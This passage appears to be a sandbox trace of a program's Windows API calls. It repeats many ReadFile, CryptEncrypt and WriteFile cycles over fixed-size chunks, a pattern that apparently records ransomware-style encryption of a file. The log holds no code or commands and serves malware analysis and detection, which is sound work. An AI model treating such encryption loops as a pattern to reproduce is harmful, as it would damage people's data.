lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.144] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.144] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.144] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.144] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.144] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.144] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.144] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.145] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.145] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.145] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.145] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.145] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.145] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.146] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.146] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.146] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.146] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.146] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.146] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.147] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.147] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.147] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.147] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.147] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.148] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.148] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.148] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.148] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.148] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.148] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.149] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.149] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.149] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.149] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.149] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.149] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.150] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.150] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.150] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.150] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.150] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.150] WriteFile (in: 